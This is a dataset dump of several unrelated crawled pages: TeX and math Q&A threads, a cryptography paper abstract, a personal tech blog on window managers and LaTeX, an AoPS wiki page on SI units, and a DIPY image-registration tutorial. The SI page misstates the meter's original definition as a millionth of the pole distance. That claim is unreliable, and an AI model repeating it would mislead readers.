url
stringlengths
14
2.42k
text
stringlengths
100
1.02M
date
stringlengths
19
19
metadata
stringlengths
1.06k
1.1k
https://tex.stackexchange.com/questions/446246/what-is-the-best-way-to-space-an-equation
# What is the best way to space an equation? Recently I have chosen to change the typical way of writing in math mode for one in which before certain operators or symbols there is a space in between (think about arrows, =, :, etc.). Consider this MWE: \documentclass{article} \usepackage[spanish]{babel} \selectlanguage{spanish} \usepackage[utf8]{inputenc} \usepackage[T1]{fontenc} \usepackage{amsmath} \begin{document} Normal writing: $x+2=0\Rightarrow x=-2.$ Own writing: $\begin{matrix}x+2 & = & 0 && \Rightarrow && x & = & -2.\end{matrix}$ \end{document} Another example: $\begin{matrix} \begin{cases}y\quad=&xk_1,\; k_1\in\mathbb Z\\z\quad=&xk_2,\; k_2\in\mathbb Z\end{cases} &\Rightarrow& y+z&=&xk_1+xk_2 &\Rightarrow& y+z=x\underbrace{(k_1+k_2)}_{k_3\in\mathbb Z}&\Rightarrow& y+z=xk_3 &\Rightarrow& x\mid y+z. \end{matrix}$ Note that it produces an extra alignment message but the point is that I don't want to manually set space to not make that mistake again. I use matrix environment because: • it's easy to program; • automatic centering when the \\ command is used; • requires a single package to work. Anyway, when there are certain types of equations keeping them centered it becomes a bit visually annoying. In addition, I use a personalized space for each environment (not a general number): Example 1: $\begin{matrix}x+2+1+52&=&2\\y&=&2\\z&=&1\end{matrix}$ Example 2 (same as Example 1 but with vertical space): $\def\arraystretch{1.5}\begin{matrix}x+2+1+52&=&2\\y&=&2\\z&=&1\end{matrix}$ Example 3 (with more vertical space): $\def\arraystretch{3.0}\begin{matrix}\displaystyle\int_2^2{x\;\text dx}&=&2+\dfrac x2\\\displaystyle\int_2^2{x\;\text dx}&=&2+\dfrac x2\end{matrix}$ Note that I typed manually the convenient array strecth to match the other spaces as best as possible. I do it for every equation in the document... Also in a matrix environment there could be more substructures, such as cases,array, etc. I would like to know if there is any environment that does this work or how it could be automated as best as possible to keep the horizontal spaces vertical (maybe using a personalized command, maybe a package, etc.). Any kind of contribution is appreciated. Thanks! • Sorry, but if you want to change "normal writing" of math into "something unreadable", I don't feel like spending my own time helping you to do that! – alephzero Aug 16 '18 at 7:43 • Thank you for answering! I don't know if is a "something unreadable" change. Think about in a five or six lines of integrals; there are very tight! – manooooh Aug 16 '18 at 7:45 • Honestly I agree the result is very unreadable. However, consider that all the spacing LaTeX inserts is based on some configurable lengths, so instead of ad-hoc hacking with matrices, you could look into how relations and operators are spaced (\mathrel, \mathbin etc) and the corresponding vertical lengths – Bordaigorl Aug 16 '18 at 8:57 • The tabstackengine package allows things to be set with a uniform vertical gap (see "short stacks" in stackengine package documentation), and with math tabbing with customized horizontal spacing. What it won't allow is the numbering of individual equations. See mirrors.ibiblio.org/CTAN/macros/latex/contrib/stackengine/…, ctan.mirrors.hoobly.com/macros/latex/contrib/tabstackengine/…. – Steven B. Segletes Aug 16 '18 at 9:50 The tabstackengine package allows things to be set with a uniform vertical gap (see "short stacks" in stackengine package documentation), and with math tabbing with customized horizontal spacing. What it won't allow is the numbering of individual equations. I created \CtabbedShortstack to mean centered \tabbedShortstack, as the packages \Centerstack, \Vectorstack and \Matrixstack employ "long stacks" which have a constant baselineskip, rather than a constant gap. In the MWE below, there is a 12pt gap between equations, and an extra 7pt of horizontal gap added to the horizontal spacing around tabs. Because the OP's example seemed to show it, I retained centered alignment of columns, rather than something akin to align (which in this case would be rcl alignment). \documentclass{article} \usepackage{tabstackengine} \TABstackMath \TABstackMathstyle{\displaystyle} \setstackgap{S}{12pt} \setstacktabbedgap{7pt} \TABbinary \newcommand\CtabbedShortstack[2][c]{% \setbox0=\hbox{\tabbedShortstack[#1]{#2}}% \vcenter{\box0}% } \begin{document} \noindent Example 2: $\tabbedShortstack{ x + 2 + 1 + 52 &=& 2\\ y &=& 2\\ z &=& 1 }$ Example 3: $\tabbedShortstack{ \int_2^2 x \,dx &=& 2 + \frac{x}{2}\\ \int_2^2 x \,dx &=& 2 + \frac{x}{2} }$ First in stack numbered $$\tabbedShortunderstack{ x + 2 + 1 + 52 &=& 2\\ \int_2^2 x \,dx &=& 2 + \frac{x}{2} }$$ Last in stack numbered $$\tabbedShortstack{ \int_2^2 x \,dx &=& 2 + \frac{x}{2}\\ x + 2 + 1 + 52 &=& 2 }$$ Middle of stack numbered $$\CtabbedShortstack{ \int_2^2 x \,dx &=& 2 + \frac{x}{2}\\ \int_2^2 x \,dx &=& 2 + \frac{x}{2} }$$ \end{document}
2019-08-24 10:03:36
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 3, "x-ck12": 0, "texerror": 0, "math_score": 0.8761827945709229, "perplexity": 2495.3132369492896}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-35/segments/1566027320156.86/warc/CC-MAIN-20190824084149-20190824110149-00397.warc.gz"}
https://eprint.iacr.org/2021/1273
### OpenSquare: Decentralized Repeated Modular Squaring Service Sri AravindaKrishnan Thyagarajan, Tiantian Gong, Adithya Bhat, Aniket Kate, and Dominique Schröder ##### Abstract Repeated Modular Squaring is a versatile computational operation that has led to practical constructions of timed-cryptographic primitives like time-lock puzzles (TLP) and verifiable delay functions (VDF) that have a fast growing list of applications. While there is a huge interest for timed-cryptographic primitives in the blockchains area, we find two real-world concerns that need immediate attention towards their large-scale practical adoption: Firstly, the requirement to constantly perform computations seems unrealistic for most of the users. Secondly, choosing the parameters for the bound $T$ seems complicated due to the lack of heuristics and experience. We present Opensquare, a decentralized repeated modular squaring service, that overcomes the above concerns. Opensquare lets clients outsource their repeated modular squaring computation via smart contracts to any computationally powerful servers that offer computational services for rewards in an unlinkable manner. Opensquare naturally gives us publicly computable heuristics about a pre-specified number ($T$) and the corresponding reward amounts of repeated squarings necessary for a time period. Moreover, Opensquare rewards multiple servers for a single request, in a sybil resistant manner to incentivise maximum server participation and is therefore resistant to censorship and single-points-of failures. We give game-theoretic analysis to support the mechanism design of Opensquare: (1) incentivises servers to stay available with their services, (2) minimizes the cost of outsourcing for the client, and (3) ensures the client receives the valid computational result with high probability. To demonstrate practicality, we also implement Opensquare's smart contract in Solidity and report the gas costs for all of its functions. Our results show that the on-chain computational costs for both the clients and the servers are quite low, and therefore feasible for practical deployments and usage. Note: Published at ACM CCS 2021 Available format(s) Category Cryptographic protocols Publication info Preprint. MINOR revision. Keywords Time-Lock PuzzlesRepeated Modular SquaringSmart Contracts Contact author(s) t srikrishnan @ gmail com History 2022-03-16: revised See all versions Short URL https://ia.cr/2021/1273 CC BY BibTeX @misc{cryptoeprint:2021/1273, author = {Sri AravindaKrishnan Thyagarajan and Tiantian Gong and Adithya Bhat and Aniket Kate and Dominique Schröder}, title = {OpenSquare: Decentralized Repeated Modular Squaring Service}, howpublished = {Cryptology ePrint Archive, Paper 2021/1273}, year = {2021}, note = {\url{https://eprint.iacr.org/2021/1273}}, url = {https://eprint.iacr.org/2021/1273} } Note: In order to protect the privacy of readers, eprint.iacr.org does not use cookies or embedded third party content.
2023-01-30 07:24:34
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.2227097600698471, "perplexity": 8849.059410217027}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-06/segments/1674764499804.60/warc/CC-MAIN-20230130070411-20230130100411-00243.warc.gz"}
http://mathhelpforum.com/advanced-algebra/112250-linear-transformation.html
1. ## Linear Transformation If is a linear transformation such that 1 2 11 14 6 and 4 -1 17 2 6 , what is the standard matrix of T? Any help is appreciated 2. I dont know what standard matrix is, but I am going to assume it means the matrix of T with respect to the standard basis. Now what you need to find is what T does to the standard basis $T\left(\begin{bmatrix}1\\2\end{bmatrix}\right)=T\l eft(\begin{bmatrix}1\\0\end{bmatrix}+2\cdot\begin{ bmatrix}0\\1\end{bmatrix}\right)=T\left(\begin{bma trix}1\\0\end{bmatrix}\right)+2T\left(\begin{bmatr ix}0\\1\end{bmatrix}\right)=\begin{bmatrix}11\\14\ \6\end{bmatrix}$ And : $T\left(\begin{bmatrix}4\\-1\end{bmatrix}\right)=T\left(4\cdot\begin{bmatrix} 1\\0\end{bmatrix}-1\cdot\begin{bmatrix}0\\1\end{bmatrix}\right)=4T\l eft(\begin{bmatrix}1\\0\end{bmatrix}\right)-1T\left(\begin{bmatrix}0\\1\end{bmatrix}\right)=\b egin{bmatrix}17\\2\\6\end{bmatrix}$ Multiplying the lower formula by 2 and adding to the upper one gives: $9T\left(\begin{bmatrix}1\\0\end{bmatrix}\right)+0= \begin{bmatrix}11\\14\\6\end{bmatrix}+2\cdot\begin {bmatrix}17\\2\\6\end{bmatrix}$ So that $T\left(\begin{bmatrix}1\\0\end{bmatrix}\right)=\fr ac{1}{9}\cdot\begin{bmatrix}54\\18\\18\end{bmatrix }$ Now find $T\left(\begin{bmatrix}0\\1\end{bmatrix}\right)$ And the standard matrix would then be: $\begin{bmatrix}T\left(\begin{bmatrix}1\\0\end{bmat rix}\right) & T\left(\begin{bmatrix}0\\1\end{bmatrix}\right)\end {bmatrix}$ 3. As above, I repeat equations. $T(\vec{x})=A\vec{x},A=[T(\vec{e}_1)\ \ T(\vec{e}_2)]$ $T(\vec{e}_1)=\frac{1}{9}\cdot\begin{bmatrix} *45* \\18\\18\end{bmatrix}=\begin{bmatrix} 5 \\2\\2\end{bmatrix}\ ,\ T(\vec{e}_2)=\begin{bmatrix} 3 \\6\\2\end{bmatrix}\ ,\ A=\begin{bmatrix} 5&3\\2&6\\2&2\end{bmatrix}$
2017-08-23 02:43:00
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 8, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.771426796913147, "perplexity": 503.83296377184377}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-34/segments/1502886117519.82/warc/CC-MAIN-20170823020201-20170823040201-00045.warc.gz"}
http://www.rlazo.org/page/2/
# StumpWM: my new Window Manager I used Awesome as my window manager for over two years and I really like it. It was my first “tiling” WM (although it’s described as a tiling wm, but more of a floating-tiling mix, see its features and non-features). Besides that, it was really configurable, and I mean it. Your configuration file (.config/rc.lua) may seem like half of the implementation of the WM, because there is defined which layouts are supported, how many tags to use, how to name them, the default keybindings, the mouse actions, etc. (here is mine). Probably, as with many WM, Awesome is too spartan for Gnome/KDE users. But again, it is for people that like minimalism. If you want to give it a try, do it, and do it for a week at least. It’s nice. If it is soooo good, why did I change it? well, I had some stability issues with it for a while (which ended been problems with Xorg, so it’s not their fault). Also, there are two features I don’t like. First, while bringing lots of flexibility, the config file is usually “cluttered” with code you don’t want to see. As I said, it seems like half of the WM is written in the config file, so you have tons of code defining the default WM behaviour and, after a while, you stop feeling like you are configuring the WM and start feeling that you are patching it. Every new release was an exercise of retrofitting your changes to the new default config file, otherwise you may lose some of the new features bring by the update. Awful. Second, lua. The config file and other parts of the WM are written in lua, which is not part of my personal preferences. I may be biased by my lack of knowledge about programming in lua, or maybe not, even Julien Danjou, the original author of Awesome, has ranted about it. So, one day I decided to try other tiling WM. I installed stumpwm, i3, ratpoison, and xmonad. I never got pass the first one. StumpWM is not the most stable WM out there, nor the most lightweight (it requires a CL interpreter), and it has neither a large nor extremely active community (its latest stable release is from March 2010, but the repository is active so you get your code from there). Now, to the good stuff. StumpWM is tiling, but has some support for floating “groups” (desktops). AFAIK, it doesn’t have the advance automatic tiling layouts of Awesome, so its window placement capabilities are more closely related to GNU Screen or Emacs Frames, but given that I usually have a single app in full-screen mode it doesn’t matter. What really make StumpWM shine is that it’s written in Common-Lisp. It’s at least as configurable as awesome while keeping your configuration file clean. Being Common-lisp, you can write a new function and it will override the previous one (not as powerful as advices in emacs, but close enough). If you don’t know lisp, learning it is very easy. Once you passed the feeling of “why there are so many parenthesis?” and get use to the prefix (+ 3 2) syntax, you will see it’s pure genius. If you want to give it a try, the best way to do it is following the ArchLinux wiki. Also, take a look at the awesome Stumpwm experience video. # Problems with x11-terms/rxvt-unicode I had some graphical problems with urxvt, it didn’t showed some lines, and I needed to switch between workspace (so the window was refreshed) to see the content. After a long search I found a youtube video which shows (almost) exactly my problem, and a solution I just needed to recompile it with +truetype as useflag. Hope this is useful to somebody else. # (sort of) Bye, Bye, Dropbox I use Dropbox, and I (kind of still) think it is a great service, but then I found out that they do server-side encryption, so they have access to all the data. Last Sunday they have tiny security problem which make all accounts accessible using any password. I have to admit that I do store some important information there, but I did my homework and encrypted it using pgp before uploading. Still, I’m taking the next step: I’ve switched to SpiderOak as my main remote storage/sync service, given that they do client-side encryption, so my data is safe(r). My Dropbox account is going to store anything which I have absolutely problem sharing. # Beamer handouts with notes This week, while working on a presentation I had to give, I wanted to create a nice handout with extra lines on one side to write some notes. I’ve seen people doing this all the time with other presentation software, so I supposed that it was possible with beamer. If you read the Beamer user guide (PDF), it mentions modifying the heading to include the handout option, and to add an additional command specify the number of pages per page: \documentclass[handout]{beamer} % Other packages... \pgfpagesuselayout{2 on 1}[a4paper,border shrink=5mm] This produced a PDF with two slides per page (or more depending on what you want), but no notes space anywhere. Some further googling showed a TeX StackExchange entry with the solution, which pointed to this blog post by Guido Diepen. What you need to do is download this package, and add it to your document preamble, and then modify the pgfpagesuselayout (to include with notes) command like this: % add this package to your directory (not in CTAN!) \usepackage{handoutWithNotes} \pgfpagesuselayout{2 on 1 with notes}[a4paper,border shrink=5mm] Check out the original blog post by Guido to see examples and more options. Enjoy! P.d. I forgotted to add with notes the first time, and I didn’t realized that right away. So be aware in case you are as sloppy as I am. # Beamer + Bibtex I was trying to get Beamer + Bibtex working just like I did with a regular article, just including a frame with the reference. So this is my first attempt: \begin{frame} \begin{small} \phantomsection \bibliographystyle{plain} \bibliography{bibliography} \end{small} \end{frame} \end{document} I didn’t like the size of the entries, and the fact that they only spawn a single frame, so only a few entries were visible. Some Googling and I came with an improved solution: \begin{frame}[shrink=5,allowframebreaks] \begin{small} \phantomsection \bibliographystyle{plain} \bibliography{bibliography} \end{small} \end{frame} \end{document} Then I realized that the citations weren’t included in the bibliography!. Sure, the entries were there but, which one was the “13″? Bibtex showed some nice, and pretty useless, icons instead of the citations. Further Googling unveiled an answer (may be others), using natbib+bibtex (here is a quick reference to natbib): % before \begin{document} \usepackage[square]{natbib} \newcommand{\newblock}{} Enjoy. I know being tracked by Google/Microsoft/Facebook wherever on the net is not something you really want, so I’ve made a couple of changes lately to mitigate that. I decided to get rid of my Facebook account, and it wasn’t easy. They have a creepy amount of data about you, and all this Facebook-enabled sites give information to Facebook. That, and the fact that it is a big time sucker, moved me to delete my account. If you want to know how to do it, read here. My blog used to have Google Analytics, but now I’ve found a compelling, open-source, alternative: Piwik. It has a very nice interface, and there is a WordPress plugin to easily integrated it. So, if you are visiting this blog, you are no longer tracked by Google Analytics. Now that I’m talking about privacy, I just want to add that I do use Google’s search engine, buzz, gmail, reader and picasa. Google search results are the best, so I don’t think I will be switching to something else anywhere soon; I’m alternating buzz and twitter as my “social” networks, I don’t like the alternatives to picasa or reader, so I’m sticking to them. And yes, I trust Google more than I trust Facebook. Edit: As pointed out by Seth in a comment, you don’t need to set your username nor password if you are going to use oauth and the master password, as I’m doing. My configuration snippet now reflects that. I started to get interested on Twitter a few weeks ago, after some time having my account abandoned. I’m using Twittering mode, which is pretty nice: has support for oauth (twitter.el don’t have that, so don’t bother trying to use it), supports multiple url shorteners (I use bit.ly), easy navigation, tons of functionalities (check the EmacsWiki for a comprehensive list). Get it from github: git clone git://github.com/hayamiz/twittering-mode.git Today I found this blog post, which explains how to avoid the oauth request every time you start your emacs: (setq twittering-use-master-password t) Of course, EmacsWiki also explains that but is burried inside a comment, so I didn’t read it… This is my configuration: (require 'twittering-mode) '(progn (setq twittering-timer-interval 36000 ; I don't want auto-refresh twittering-bitly-api-key "XXX" ; find it on bit.ly settings # Nice Python Gems EDIT (9/18/2011): There is another way of having a default value in python dictionaries, and it’s using the defaultdict class in the collections module (python 2.5).  Here are the docs. I was checking my old bookmarks and I stumbled upon these two blog posts: Gems of Python by Eric Florenzano and Python gems of my own by Eric Holscher. Did you know about setdefault for dicts? I’ve found myself more than once using a dict as a multimap and I always felt that there must be a better way of doing it than this: dct = {} items = ['anne', 'david', 'kevin', 'eric', 'anthony', 'andrew'] for name in items: if name[0] not in dct: dct[name[0]] = [] dct[name[0]].append(name) And I was right, from Eric Florenzano’s post: dct = {} items = ['anne', 'david', 'kevin', 'eric', 'anthony', 'andrew'] for name in items: dct.setdefault(name[0], []).append(name) I knew it… # Things I keep forgetting: Gnus reply key bindings ### Summary mode: While reading a mail, you could reply to it using the following commands: key command
2014-04-18 03:00:54
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.39083290100097656, "perplexity": 2121.369114882977}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2014-15/segments/1397609532480.36/warc/CC-MAIN-20140416005212-00184-ip-10-147-4-33.ec2.internal.warc.gz"}
https://artofproblemsolving.com/wiki/index.php/SI
# Systme international (Redirected from SI) The système international of units (French for "international system"), more commonly known as the metric system, is a system of standardized measurements or units that are based on the number ten. ## Origin The metric system was first suggested at the prodigious French school École Polytechnique, supported by well-known mathematician and physicist Joseph Louis Lagrange. They derived the metric unit of length, the meter, from what they considered to be $\frac{1}{10^6}$th of the distance from a certain point in Europe to the North Pole. It is now known that it is actually approximately $\frac{1.16}{10^6}$th of the distance. ## Prefixes The majority of the units of the metric system can be increased or decreased by factors of ten using the following system: • Yocto - $10^{-24}$ • Zepto - $10^{-21}$ • Atto - $10^{-18}$ • Femto - $10^{-15}$ • Pico - $10^{-12}$ • Nano - $10^{-9}$ • Micro - $10^{-6}$ • Milli - $10^{-3}$ • Centi - $10^{-2}$ • Deci - $10^{-1}$ • No prefix - $10^{0}$, or just $1$. • Deka (or Deca) - $10^{1}$ • Hecto - $10^{2}$ • Kilo - $10^3$ • Mega - $10^6$ • Giga - $10^9$ • Tera - $10^{12}$ • Peta - $10^{15}$ • Exa - $10^{18}$ • Zetta - $10^{21}$ • Yotta - $10^{24}$ ## Types of Measure The following measures are part of the metric system: ## See Also Retrieved from "" Invalid username Login to AoPS
2021-06-18 12:20:39
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 24, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8692077994346619, "perplexity": 6318.841550545272}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-25/segments/1623487636559.57/warc/CC-MAIN-20210618104405-20210618134405-00019.warc.gz"}
http://math.stackexchange.com/questions/239171/questions-on-bayesian-analysis-of-an-opinion-poll-an-example-in-a-book
# Questions on Bayesian analysis of an opinion poll (an example in a book) I'm sorry in advance for rather long questions. This is an example in "Bayesian logical data analysis for physical sciences" by P. C. Gregory and I have some questions about the example. In a poll of 800 decided voters, 440 voters supported the political party A. Let's denote the poll result as $D$. The quantity of interest is the probability that the party A will achieve a majority of at least 51% in the upcoming election, assuming the poll will be representative of the population at the time of the election. The book regards the problem as a model selection problem. $M_1$ : The party A will achieve a majority with a parameter $H$ that has uniform prior in the range $0.51 \le H \le 1$. $M_2$ : The party A will not achieve a majority with a parameter $H$ that has uniform prior in the range $0 \le H < 0.51$. If we have no prior reason to prefer $M_1$ over $M_2$, we can write the odds ratio \begin{aligned} O_{12}&=p(M_1|D,I)/p(M_2|D,I)\\ &=p(D|M_1,I)/p(D|M_2,I)\\ &=\frac{\int_{0.51}^1 p(H|M_1,I)p(D|H,M_1,I) dH }{\int_{0}^{0.51} p(H|M_2,I)p(D|H,M_2,I) dH}\\ &=\frac{\int_{0.51}^1 (1/0.49)p(D|H,M_1,I) dH }{\int_{0}^{0.51} (1/0.51)p(D|H,M_2,I) dH}\\ &=87.68 \end{aligned} Here are my questions. The book don't give explicit expressions for $p(D|H,M_1,I)$ and $p(D|H,M_2,I)$. If I use binomial distribution $$p(D|H,M_1,I)=p(D|H,M_2,I)=\frac{800! H^{440}(1-H)^{800-440}}{440!(800-440)!}$$ I get $87.03$ as a result. It is not same to the value $87.68$ of the Book. What probability distribution should I use for the likelihoods? I have another question. Why do I have to introduce the models $M_1$ and $M_2$? Is $$O_{12}=\frac{\int_{0.51}^1 p(H|D,I) dH}{\int_{0}^{0.51} p(H|D,I) dH}$$ not an appropriate aproach for the problem? It does not have the factor $(1/0.49)/(1/0.51)$ introduced with the models $M_1$ and $M_2$. - $87.03$ looks reasonable to me as the ratio of the integrals. The reason for the models and the $p(H|M,I)$ terms is to avoid rewarding uncertain hypotheses for their uncertainty. You may disagree, arguing that uncertain hypotheses are more likely to be true. For example, if one hypothesis was that $H=0.55$ exactly and the other was $0 \le H \lt 0.1$, then your final suggestion would always give $O_{12}=0$ no matter what data was supplied, since the numerator would always be an integration over a zero-length interval, while the denominator would always be positive.
2016-07-29 00:33:31
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8559667468070984, "perplexity": 225.06379723394065}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2016-30/segments/1469257829320.91/warc/CC-MAIN-20160723071029-00022-ip-10-185-27-174.ec2.internal.warc.gz"}
https://dipy.org/documentation/1.5.0/examples_built/affine_registration_3d/
# Affine Registration in 3D This example explains how to compute an affine transformation to register two 3D volumes by maximization of their Mutual Information [Mattes03]. The optimization strategy is similar to that implemented in ANTS [Avants11]. We will do this twice. The first part of this tutorial will walk through the details of the process with the object-oriented interface implemented in the dipy.align module. The second part will use a simplified functional interface. from os.path import join as pjoin import numpy as np from dipy.viz import regtools from dipy.data import fetch_stanford_hardi from dipy.data.fetcher import fetch_syn_data from dipy.align.imaffine import (transform_centers_of_mass, AffineMap, MutualInformationMetric, AffineRegistration) from dipy.align.transforms import (TranslationTransform3D, RigidTransform3D, AffineTransform3D) Let’s fetch two b0 volumes, the static image will be the b0 from the Stanford HARDI dataset files, folder = fetch_stanford_hardi() pjoin(folder, 'HARDI150.nii.gz'), return_img=True) static = np.squeeze(static_data)[..., 0] static_grid2world = static_affine Now the moving image files, folder2 = fetch_syn_data() pjoin(folder2, 'b0.nii.gz'), return_img=True) moving = moving_data moving_grid2world = moving_affine We can see that the images are far from aligned by drawing one on top of the other. The images don’t even have the same number of voxels, so in order to draw one on top of the other we need to resample the moving image on a grid of the same dimensions as the static image, we can do this by “transforming” the moving image using an identity transform identity = np.eye(4) affine_map = AffineMap(identity, static.shape, static_grid2world, moving.shape, moving_grid2world) resampled = affine_map.transform(moving) regtools.overlay_slices(static, resampled, None, 0, "Static", "Moving", "resampled_0.png") regtools.overlay_slices(static, resampled, None, 1, "Static", "Moving", "resampled_1.png") regtools.overlay_slices(static, resampled, None, 2, "Static", "Moving", "resampled_2.png") We can obtain a very rough (and fast) registration by just aligning the centers of mass of the two images c_of_mass = transform_centers_of_mass(static, static_grid2world, moving, moving_grid2world) We can now transform the moving image and draw it on top of the static image, registration is not likely to be good, but at least they will occupy roughly the same space transformed = c_of_mass.transform(moving) regtools.overlay_slices(static, transformed, None, 0, "Static", "Transformed", "transformed_com_0.png") regtools.overlay_slices(static, transformed, None, 1, "Static", "Transformed", "transformed_com_1.png") regtools.overlay_slices(static, transformed, None, 2, "Static", "Transformed", "transformed_com_2.png") This was just a translation of the moving image towards the static image, now we will refine it by looking for an affine transform. We first create the similarity metric (Mutual Information) to be used. We need to specify the number of bins to be used to discretize the joint and marginal probability distribution functions (PDF), a typical value is 32. We also need to specify the percentage (an integer in (0, 100]) of voxels to be used for computing the PDFs, the most accurate registration will be obtained by using all voxels, but it is also the most time-consuming choice. We specify full sampling by passing None instead of an integer nbins = 32 sampling_prop = None metric = MutualInformationMetric(nbins, sampling_prop) To avoid getting stuck at local optima, and to accelerate convergence, we use a multi-resolution strategy (similar to ANTS [Avants11]) by building a Gaussian Pyramid. To have as much flexibility as possible, the user can specify how this Gaussian Pyramid is built. First of all, we need to specify how many resolutions we want to use. This is indirectly specified by just providing a list of the number of iterations we want to perform at each resolution. Here we will just specify 3 resolutions and a large number of iterations, 10000 at the coarsest resolution, 1000 at the medium resolution and 100 at the finest. These are the default settings level_iters = [10000, 1000, 100] To compute the Gaussian pyramid, the original image is first smoothed at each level of the pyramid using a Gaussian kernel with the requested sigma. A good initial choice is [3.0, 1.0, 0.0], this is the default sigmas = [3.0, 1.0, 0.0] Now we specify the sub-sampling factors. A good configuration is [4, 2, 1], which means that, if the original image shape was (nx, ny, nz) voxels, then the shape of the coarsest image will be about (nx//4, ny//4, nz//4), the shape in the middle resolution will be about (nx//2, ny//2, nz//2) and the image at the finest scale has the same size as the original image. This set of factors is the default factors = [4, 2, 1] Now we go ahead and instantiate the registration class with the configuration we just prepared affreg = AffineRegistration(metric=metric, level_iters=level_iters, sigmas=sigmas, factors=factors) Using AffineRegistration we can register our images in as many stages as we want, providing previous results as initialization for the next (the same logic as in ANTS). The reason why it is useful is that registration is a non-convex optimization problem (it may have more than one local optima), which means that it is very important to initialize as close to the solution as possible. For example, let’s start with our (previously computed) rough transformation aligning the centers of mass of our images, and then refine it in three stages. First look for an optimal translation. The dictionary regtransforms contains all available transforms, we obtain one of them by providing its name and the dimension (either 2 or 3) of the image we are working with (since we are aligning volumes, the dimension is 3) transform = TranslationTransform3D() params0 = None starting_affine = c_of_mass.affine translation = 